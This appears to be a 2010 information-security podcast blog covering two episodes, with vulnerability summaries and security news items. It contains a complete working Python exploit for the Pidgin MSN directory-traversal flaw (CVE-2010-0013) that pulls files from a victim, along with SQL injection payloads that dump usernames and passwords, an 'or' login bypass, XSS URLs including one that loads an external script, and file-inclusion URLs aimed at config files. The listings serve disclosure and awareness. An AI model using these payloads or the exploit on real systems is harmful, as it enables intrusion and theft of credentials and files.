Interestingly, some apps that include sexual content, such as Playboy’s, seem to have been missed by the recent purge–so far, at least. Doing a search for “girls” on the App Store will bring up a variety of apps with bikini-clad women and others that appear to break the new rules Chillifresh said Apple outlined.

Posted | Comments Off

Read More

Episode 73 – N1H1

Play

ISD Podcast Episode 73 for February 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Vulnerabilities of Interest:

  1. The Linux kernel is subject to a RTO (Retransmission Timeouts) Remote Denial of Service Vulnerability.  Attackers can exploit this issue to cause an excessive load on CPU and network resources, denying service to legitimate users. Attackers can use readily available network utilities to exploit this issue.
  2. WSC CMS is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example is available:
    1- http://www.sample.com/public/backoffice
    2- login with “admin” as user name and ‘or’ as password
  3. Gretech GOM Player is subject to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. GOM Player 2.1.21.4846 is vulnerable; other versions may also be affected.
  4. Konversation IRC is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition.  Versions prior to Konversation 1.2.3 are vulnerable. An attacker can use readily available network utilities to exploit this issue.
  5. vBseo is subject to a Local File Include vulnerability.  Version 3.1.0 is vulnerable, though other versions my be impacted. Exploit code is availabe: http://www.sample.com/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]
  6. Official Portal 2007 is subject to multiple vulnerabilities, including SQL injection and Cross Site Scripting. Google Dork: “Official Portal 2007″ Exploit code is availabe. SQL injection: http://www.sample.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser–
    Cross Site Scripting: http://www.sample.com/?fa=<SCRIPT/SRC=”http://site.com/xss.js”>&lt;/SCRIPT>

News Items of Interest:

News item 1:  http://gcn.com/articles/2010/02/19/nist-crypto-docs-021910.aspx

The National Institute of Standards and Technology has released two documents as part of its Cryptographic Key Management Project — a summary of a key management workshop held in June that explored the risks and challenges of handling cryptographic keys in new technological environments, and a draft of recommendations for agencies on transitioning to new algorithms and keys.

Key management is one of the most difficult tasks in cryptography, because a cryptographic algorithm or scheme is only as secure as the keys used to encrypt and decrypt data. The scalability and usability of the methods used to distribute keys are of particular concern. NIST’s key management project is an effort to improve the overall key management strategies to enhance the usability of cryptographic technology, provide scalability and support a global cryptographic key management infrastructure.

The first step in achieving those goals was a workshop NIST hosted in June that examined the obstacles in using the key management methodologies currently in use. It also covered alternative technologies that key management needs to accommodate and approaches for moving from current methodologies to more desireable methods.

The results of the workshop are summarized in NIST Interagency Report 7609. An approach to transitioning to new generations of keys and algorithms is provided in a draft of Special Publication 800-131, “Recommendation for the Transitioning of Cryptographic Algorithms and Key Sizes.”

News item 2: http://www.tzi.de/~edelkamp/secart

SECART – Second International Workshop on Security and Artificial Intelligence Atlanta, Georgia, July 11, 2010.  Workshop themes include both applied and theoretical results regarding the application of AI techniques to security problems (or, alternatively, novel security issues caused by the use of AI techniques).  Possible topics include but are not limited to the

following:

*  Knowledge Representation and Engineering for Cyber Security

*  Secure Web Services

*  Development of Trusted Software

*  Data Mining and Forensics

*  Automated Vulnerability Analysis

*  Automated Exploit and Attack Generation

*  Automated Alerting and Response

*  Diagnosis and Plan Recognition

*  Automating Security Analyses and Audits

*  Artificial Immune Systems

*  Privacy and Confidentiality

*  Intelligent User Interfaces for Security Applications

*  Security and Organizational Structure

WORKSHOP ORGANISERS

Chairs:

Mark Boddy

Adventium Labs

Minneapolis, USA

mark.boddy@adventiumlabs.org

Stefan Edelkamp

TZI

University Bremen, Germany

edelkamp@tzi.de

Robert P. Goldman

SIFT, LLC

Minneapolis, USA

rpgoldman@sift.info

Program Committee:

Lee Badger (NIST, US)

Bob Balzer (Teknowledge, US)

Mark Boddy (Adventium Labs, US)

Cas Cremers (ETH, Switzerland)

Stefan Edelkamp (U Bremen, G)

Chris Geib (U Edinburgh, GB)

Robert P. Goldman (SIFT, US)

Rachel Greenstadt (Drexel U, US)

Henry Kautz (U of Rochester, US)

Alessio Lomuscio (IC London, GB)

Norbert Pohlmann (IF(IS), G)

Anil Somayaji (Carleton U, CA)

Shannon Spires (Sandia Labs, US)

Tim Strayer (BBN Technologies, US)

Karsten Sohr (TZI Bremen, G)

Dan Thomsen (SIFT and CDA, US)

Luca Vigano (U Verona, I)

Yacine Zemali (LIFO, FR)

Deadline for submissions:   March 29, 2010

Notification of acceptance: April 15, 2010

Final versions due:         May 4, 2010

Articles should be submitted in pdf format of up to 8 pages in AAAI plain article style are to be submitted to the Easy Chair (https://www.easychair.org/login.cgi?conf=secart10) system by the March 29, 2010 deadline.

Attendance fees will be posted as they become available from AAAI. In the past, AAAI has permitted workshop-only registrations. SECART is affilliated with AAAI-10

News item 3: http://www.dailymail.co.uk/news/worldnews/article-1252738/Argentinian-hackers-plaster-countrys-flag-Falklands-newspaper-website-new-conflict-begins.html

Argentinian hackers drew first blood in the latest Falklands stand-off by plastering the country’s flag across the islands. newspaper website.

The computer attack came as a British oil rig was set to begin searching for oil after arriving in the South Atlantic waters from Scotland.

The Argentine activists hacked into the English-language Penguin News to post a flag on the home page and an audio recording of the song “March of the Malvinas,” Argentina’s name for the Falklands.

They also wrote ‘the islands are Argentine’ and claimed the move was a ‘tribute’ to the country’s soldiers who died during the Falklands War.

The material has now been removed.
News item 4: http://twitter.com/th3j35t3r
Infamous patriot hacker The Jester (th3j35t3r) has released a video demonstration of the XerXeS DoS attack as it is unleashed on the Taliban website www.alemarah.com.

The video release follows an earlier announcement that The Jester has been working to improve and automate aspects of the attack method, which unlike a DDoS attack, requires only one low spec machine to implement.
The Jester is always quick to point out his claim that his attacks produce absolutely no permanent damage to the target site, or any intermediary nodes.

Posted | Comments Off

Read More

Episode 72 – http://5z8.info/super-nsfw_qzg

Play

ISD Podcast Episode 72 for February 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

The next dc404 meeting will be at Outerzone near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)
May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. Libpurple is subject to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. Versions prior to Libpurple 2.6.5 are vulnerable.
    #!/usr/bin/env python
    “”"
    Pidgin MSN <= 2.6.4 file download vulnerability
    Mathieu GASPARD (gaspmat@gmail.com)

    Description:
    Pidgin is a multi-protocol Instant Messenger.

    This is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.
    The issue is caused by an error in the MSN custom smiley feature when processing emoticon requests,
    which could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.

    Affected versions :
    Pidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.
    Plugin msn-pecan 0.1.0-rc2  (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date

    Plateforms :
    Windows, Linux, Mac

    Fix :
    Fixed in Pidgin 2.6.5
    Update to the latest version : http://www.pidgin.im/download/

    References :
    [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013
    [2] http://www.pidgin.im/news/security/?id=42

    Usage :
    You need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn
    python pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]

    Example :
    # python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]

    ***********************************************************

    Pidgin MSN file download vulnerability (CVE-2010-0013)

    Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]

    ***********************************************************

    Please enter the password for the account “foo@hotmail.com”
    Password:
    [+] Connecting to server
    [+] Authentication in progress
    [+] Synchronisation in progress
    [+] OK, all done, ready to proceed
    [+] Sending request for file “../accounts.xml” to “victim@hotmail.com”
    [+] Using session_id 974948028
    Current : 3606, total: 3881  (92%)
    [+] Got an answer from the contact
    —————-
    <?xml version=’1.0′ encoding=’UTF-8′ ?>

    <account version=’1.0′>
    ……..
    “”"

    import warnings
    warnings.simplefilter(“ignore”,DeprecationWarning)
    import os
    import sys
    try:
    import pymsn
    except ImportError:
    print “Pymsn couldn’t be loaded”
    print “On debian-like systems, the package is python-msn”
    sys.exit(-1)
    import gobject
    import logging
    import getpass
    import hashlib
    from optparse import OptionParser
    import signal
    import time

    SERVER_ADDRESS = ‘messenger.hotmail.com’
    SERVER_PORT = 1863
    FD_OUT = sys.stdout
    MAINLOOP = None
    # seconds after which, if we didn’t get an answer, we quit
    TIMEOUT = 5

    global_client = None

    def quit():
    MAINLOOP.quit()
    sys.exit(0)

    def check_if_succeeds():
    # if False, we didn’t get a chunk so we won’t get any file, so we quit
    if global_client.GOT_CONTROL_BLOB == False:
    print “[+] Didn’t get an answer from the client after %d seconds, it’s likely not vulnerable or the file requested doesn’t exist/is not accessible”%TIMEOUT
    print “[+] Exiting”
    global_client.quit()

    # called when we get the result data, after our request
    def handle_answer(object, client):
    print “\n[+] Got an answer from the contact”
    d = object._data
    data = d.read()
    length = len(data)
    FD_OUT.write(data)
    # if we wrote output to stdout, don’t close it
    if FD_OUT != sys.stdout:
    FD_OUT.close()
    print “[+] Wrote %d bytes to file”%length
    client.end = time.time()
    duration = client.end – client.begin
    print “[+] Download lasted %d seconds at %d bytes/s “%(duration,(length/duration))
    client.quit()

    def my_on_chunk_recv(transport, chunk):
    global_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)
    session_id = chunk.header.session_id
    blob_id = chunk.header.blob_id
    if session_id == global_client.session_id:
    # first blob is control, we “squeeze” it and keep only the second one
    if global_client.GOT_CONTROL_BLOB == False:
    #print “Got Control blob in our connection (session_id : %d, blob_id: %d)”%(session_id, blob_id)
    global_client.GOT_CONTROL_BLOB = True
    else:
    # if connections is complete, session_id is removed from data_blobs so we have to check before accessing it
    if global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):
    current_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]
    print “Current : %d, total: %d  (%d%%)\r”%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)),
    sys.stdout.flush()

    def error_handler(self, error_type, error):
    # __on_user_invitation_failed, probably because contact is offline/invisible
    if error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \
    error == pymsn.event.ContactInviteError.NOT_AVAILABLE:
    print “[*] ERROR, contact didn’t accept our invite, probably because it is disconnected/invisible”
    quit()
    # __on_message_undelivered, probably because contact is offline/invisible
    if error_type ==  pymsn.event.ConversationErrorType.MESSAGE and \
    error ==  pymsn.event.MessageError.DELIVERY_FAILED:
    print “[*] ERROR, couldn’t send message, probably because contact is disconnected/invisible”
    quit()
    print “[*] Unhandled error, error_type : %d , error : %d”%(error_type, error)
    quit()

    class MyClient(pymsn.Client):
    def __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):
    # callback to quit
    self.quit = quit
    # victim from whom we request the file
    self.victim = victim
    # just list contacts for this account
    self.list_only = list_only
    # file we request
    self.filename = filename
    # to calculate download duration and speed
    self.begin = 0
    self.end = 0
    # session_id of the connection to retrieve the file
    self.session_id = 0
    # have we already seen the “control blob” for this connection
    self.GOT_CONTROL_BLOB = False
    pymsn.Client.__init__(self, server)
    # REALLY REALLY HACKISH
    # if contact is disconnected/invisible, a “NotImplementedError” exception is raised
    # and it can’t be caught AFAIK so it needs to be redefined here
    # handler_class should be SwitchboardClient
    for handler_class, extra_args in self._switchboard_manager._handlers_class:
    handler_class._on_error = error_handler

    class MyMSNObjectStore(pymsn.p2p.MSNObjectStore):
    def __compute_data_hash(self, data):
    digest = hashlib.sha1()
    data.seek(0, 0)
    read_data = data.read(1024)
    while len(read_data) > 0:
    digest.update(read_data)
    read_data = data.read(1024)
    data.seek(0, 0)
    return digest.digest()

    # need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because
    # the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)
    def _outgoing_session_transfer_completed(self, session, data):
    handle_id, callback, errback, msn_object = self._outgoing_sessions[session]
    msn_object._data_sha = self.__compute_data_hash(data)
    super(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)

    class ClientEventHandler(pymsn.event.ClientEventInterface):

    def on_client_error(self, error_type, error):
    if error_type == pymsn.event.ClientErrorType.AUTHENTICATION:
    print “[+] Authentication failed, bad login/password”
    self._client.quit()
    else:
    print “[*] ERROR :”, error_type, ” ->”, error

    def on_client_state_changed(self, state):
    #print “State changed to %s” % state
    if state == pymsn.client.ClientState.CLOSED:
    print “[+] Connection to server closed”
    self._client.quit()

    if state == pymsn.client.ClientState.CONNECTING:
    if self.current_state != state:
    print “[+] Connecting to server”
    self.current_state = state
    if state == pymsn.client.ClientState.AUTHENTICATING:
    if self.current_state != state:
    print “[+] Authentication in progress”
    self.current_state = state
    if state == pymsn.client.ClientState.SYNCHRONIZING:
    if self.current_state != state:
    print “[+] Synchronisation in progress”
    self.current_state = state

    if state == pymsn.client.ClientState.OPEN:
    print “[+] OK, all done, ready to proceed”
    self._client.profile.presence = pymsn.Presence.INVISIBLE
    contact_dict = {}
    for i in self._client.address_book.contacts:
    contact_dict[i.account] = i
    if self._client.list_only:
    for (k,v) in contact_dict.items():
    print k+” (“+v.display_name+”)”
    self._client.quit()
    else:
    if self._client.victim not in contact_dict.keys():
    print “[*] Error, contact %s not in your contact list”%self._client.victim
    self._client.quit()
    else:
    contact = contact_dict[self._client.victim]
    store = MyMSNObjectStore(self._client)
    object = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, ‘AAA=’,’2jmj7l5rSw0yVb/vlWAYkK/YBwk=’)
    print “[+] Sending request for file \”%s\” to \”%s\”"%(self._client.filename, self._client.victim)
    self._client.begin = time.time()
    store.request(object, [handle_answer, self._client])
    # at this moment, we got only one session_id, the one we will use to request the file
    for k in store._outgoing_sessions.keys():
    print “[+] Using session_id %d”%k._id
    self._client.session_id = k._id
    # hack to set up my own callback each time we receive a chunk, used to print the percentage of the download
    self._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received
    self._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv
    # if no file transfer received from the victim after TIMEOUT seconds, quit
    gobject.timeout_add(TIMEOUT*1000, check_if_succeeds)

    def __init__(self, client):
    self.current_state = None
    pymsn.event.ClientEventInterface.__init__(self, client)

    if __name__ == ‘__main__’:
    print “***********************************************************\n”
    print “Pidgin MSN file download vulnerability (CVE-2010-0013)\n”
    print “Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\n”
    print “***********************************************************\n”

    usage = “Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] ”
    parser = OptionParser(usage=usage)
    parser.add_option(“-f”, “–file”, dest=”filename”, default=None,
    help=”File requested to remote contact”)
    parser.add_option(“-o”, “–output”, dest=”output_file”, default=None,
    help=”Where to write received file, STDOUT otherelse”)
    parser.add_option(“-a”, “–account”, dest=”account”, default=None,
    help=”MSN account to use”)
    parser.add_option(“-c”, “–contact”, dest=”contact”, default=None,
    help=”Contact to request file from”)
    parser.add_option(“-l”, “–list”, dest=”list_only”, action=”store_true”, default=False,
    help=”Just print contact list for your account and exit”)

    (options, args) = parser.parse_args()
    if not options.filename or not options.account or not options.contact:
    if not (options.account and options.list_only):
    print “Error, parameter missing”
    parser.print_help()
    sys.exit(-1)

    if options.output_file != None:
    try:
    FD_OUT = open(options.output_file,”wb”)
    except Exception,e:
    print “Cannot open file %s (%s)”%(options.output_file, e)
    sys.exit(-1)

    MAINLOOP = gobject.MainLoop()

    def sigterm_cb():
    gobject.idle_add(quit)

    signal.signal(signal.SIGTERM, sigterm_cb)

    logging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug
    server = (SERVER_ADDRESS, SERVER_PORT)
    client = MyClient(server, quit, options.contact, options.filename, options.list_only)
    global_client = client
    client_events_handler = ClientEventHandler(client)
    print “Please enter the password for the account \”%s\”"%options.account
    try:
    passwd = getpass.getpass()
    except KeyboardInterrupt:
    quit()

    login_info = (options.account, passwd)
    client.login(*login_info)
    try:
    MAINLOOP.run()
    except KeyboardInterrupt:
    quit()

  2. vBulletin is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect vBulletin 4.0.2; other versions may also be affected. Example URLs:
    http://www.sample.com/upload/calendar.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/faq.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/forum.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/usercp.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/subscription.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/showthread.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/showgroups.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/sendmessage.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/search.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/register.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/profile.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/private.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/online.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/newthread.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/misc.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/memberlist.php?=&gt;”‘&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/member.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/inlinemod.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/index.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/forumdisplay.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
  3. phpBugTracker is subject to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view local files in the context of the webserver process, which may aid in further attacks. This issue affects phpBugTracker 1.0.1; other versions may be vulnerable as well. Example URL: http://www.sample.com/[path]/attachment.php?filename=./config.php

News Items of Interest:

News item 1:  http://www.allaboutjazz.com/php/news.php?id=50220

A band of hackers who were recently discovered hoarding a trove of account logons pilfered from thousands of companies worldwide are garden-variety cyberthieves.  The gang most likely began by hiring spam specialists to send out e- mail and social- networking posts to lure recipients into clicking on a tainted Web link.   They then used a dated free version of a hacking tool called ZeuS and did nothing to hide their tracks, indicating that “they’re probably amateurs.”

This underscores how deeply cybercriminals — from novices to elite gangs — have now saturated the Internet with infections that allow them to take full control of Windows PCs. Cybergangs slot newly infected PCs, called bots, into networks called botnets. On any given day, 12% to 15% of the 1.6 billion computers connected to the Internet are bots, according to security firm Damballa.

News item 2: http://www.suntimes.com/entertainment/music/2059068,freeallmusic-guvera-music-sites-022010.article

Two new companies are giving consumers a way to download songs for free by watching a few ads. The idea has been tried before but this time it appears it might work, because the startups have found advertisers that are willing to pay around $2 to have a moment of your time.
That means recording companies can get about as much compensation from the free services as they receive from a download on iTunes that costs the consumer $1.29.

“You pay for the song by paying attention to the advertiser,” said Richard Nailling, CEO of FreeAllMusic.com, which launched an invitation-only test of its service in December. “It’s a fair trade of attention for music.”

Both Free All Music and another new free site, Guvera.com, have licensing deals with independent labels and two of the largest recording companies, Universal Music Group and EMI Group PLC. Fans of U2, Black Eyed Peas and Norah Jones should be happy. But admirers of Ke$ha or Sade, both with Sony Music labels, will be out of luck for now.

The new services come after years of falling CD sales. More people are consuming music online but spending far less for it.

In response, recording companies have been licensing songs to an array of Internet businesses that offer songs cheaply or for free — in the hope that these legitimate alternatives can keep people from turning to illegal downloads.

News item 3:  http://www.acunetix.com/blog/websecuritynews/statistics-from-10000-leaked-hotmail-passwords/
An anonymous user posted usernames and passwords of over 10,000 Windows Live Hotmail accounts to a web site called PasteBin. PasteBin is currently down for maintenance but I managed to get a copy of the list, and quickly generated some statistics from these passwords.

Below are the statistics:

  • The list initially contained 10,028 entries.
  • After I’ve cleaned up the list, like removing entries without a password,  I had 9843 valid entries (passwords).
  • There are 8931 (90%) unique passwords in the list.
  • The longest password was 30 chars long: lafaroleratropezoooooooooooooo.
  • The shortest password was 1 char long : )

Top 20 most common passwords:

  1. 123456 – 64
  2. 123456789 – 18
  3. alejandra – 11
  4. 111111 – 10
  5. alberto – 9
  6. tequiero – 9
  7. alejandro – 9
  8. 12345678 – 9
  9. 1234567 – 8
  10. estrella – 7
  11. iloveyou  - 7
  12. daniel  - 7
  13. 000000  - 7
  14. roberto  - 7
  15. 654321  - 6
  16. bonita  - 6
  17. sebastian  - 6
  18. beatriz  - 6
  19. mariposa  - 5
  20. america  - 5

Based on these passwords I think the phishing kit was targeted towards the Latino community.

Password length distribution:

  • 1 chars – 2 – 0 %
  • 2 chars – 4 – 0 %
  • 3 chars – 4 – 0 %
  • 4 chars – 31 – 0 %
  • 5 chars – 49 – 1 %
  • 6 chars – 1946 – 22 %
  • 7 chars – 1254 – 14 %
  • 8 chars – 1838 – 21 %
  • 9 chars – 1091 – 12 %
  • 10 chars – 772 – 9 %
  • 11 chars – 527 – 6 %
  • 12 chars – 431 – 5 %
  • 13 chars – 290 – 3 %
  • 14 chars – 219 – 2 %
  • 15 chars – 157 – 2 %
  • 16 chars – 190 – 2 %
  • 17 chars – 56 – 1 %
  • 18 chars – 17 – 0 %
  • 19 chars – 7 – 0 %
  • 20 chars – 14 – 0 %
  • 21 chars – 10 – 0 %
  • 22 chars – 8 – 0 %
  • 23 chars – 3 – 0 %
  • 24 chars – 3 – 0 %
  • 25 chars – 3 – 0 %
  • 26 chars – 0 – 0 %
  • 27 chars – 3 – 0 %
  • 28 chars – 0 – 0 %
  • 29 chars – 1 – 0 %
  • 30 chars – 1 – 0 %

As you can see from the list above, most of the passwords are between 6 and 9 characters long.  Average password length is 8 characters.

What kind of passwords were in the list? :

  • 3,713 = 42 %; lower alpha passwords : passwords containing only characters from ‘a’ to ‘z’.
    Example : iloveyou
  • 291 = 3 %; mixed case alpha passwords : passwords containing  characters from ‘a’ to ‘z’ and from ‘A’ to ‘Z’.
    Example: ILoveYou
  • 1707 = 19 %; numeric passwords: passwords containing only numbers (‘0′ to ‘9′)
    Example: 123456
  • 2655 = 30 %; mixed alpha and numeric passwords: passwords containing characters from ‘a’-’z’, ‘A’-’Z’ and ‘0′-’9′.
    Example: Iloveyou12
  • 565 = 6 %; mixed alpha + numeric + other characters.
    Example: 1Love You$%@

News item 4: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=223000208
Emerging botnet could redirect users to data-stealing sites, researchers say.  Czech security experts say they have uncovered a global botnet that may be redirecting Web surfers to other sites for the purpose of stealing their data.
Jan Vykopal, head of the security project of Masaryk University, told the Czech news agency CTK earlier this week that the Czech Defense Ministry discovered the botnet during a project called CYBER, in which several agencies have been researching ways to improve the country’s cyber defenses.

The botnet’s creators have dubbed the network “Chuck Norris” after the famous Hollywood actor and martial arts expert.

Researchers told the CTK that the botnet could allow operators to breach sensitive user data, such as access details for bank accounts, email boxes, passwords to various services, social networks, and other personal data.

The botnet could conceivably be used for attacks on well-secured servers, as well, Vykopal said, but the researchers are uncertain of how many devices it has martialed.

News item 5: http://www.eweek.com/c/a/Security/FBI-Investigates-Webcam-Spy-Allegations-Against-School-451724/
The FBI is investigating allegations made against the Lower Merion School District in a lawsuit by the parents of a student. The lawsuit claims school officials used a remote-controlled Webcam to spy on their son, a high school student.

The FBI is reportedly investigating a Pennsylvaniaschool district for possible federal law violations in light of a lawsuit filed by the parents of a high school student.

News item 6:  http://www.youtube.com/watch?v=QoqRR_J9ORc%20rel=
I have a lot of interest in the naughtiness of the web and even if it just so happens that an attractive young woman going by the unusual name of “Numbers Anacker”  (user id Man17782) that has never posted a single item to my site, I might be likely to follow her.  As would more and more folks (some of whom are following her back – presumably because they are intrigued by her photograph).  As the following YouTube video demonstrates, this appears to be an attempt to get people to sign-up for a website that offers to find adults new sexual partners.

News item 7: http://www.shadyurl.com/

Link shortening has become a commonplace on services like Facebook and Twitter. Heck, even Google shortens URLs within its products now. People seem to be getting more used to the idea that shortened URLs, despite not showing you where they lead, are safe. Part of that, is that the companies that are doing the shortening keep blacklists of sites with malware or spyware, to keep people from accidentally visiting sites that will do harm.

Newcomer ShadyURL makes no such claims though. This wonderfully satirical service turns even legitimate URLs into something that even the least tech-savvy friend or family member would know better than to click on. It inserts anything from what appear to be hijacking commands, to profanity and the names of well-known malware. In other words, whomever you send one of these links to is likely to say “there’s no way I’m clicking on that,” even though it’s likely to lead to a safe site.

Here are some of the gems it spit out on some common sites:

Facebook.com became: http://5z8.info/inject_worm_w0x6_open.exe
Twitter.com became: http://5z8.info/hack-outlook_z6t4_warez

Posted | Comments Off

Read More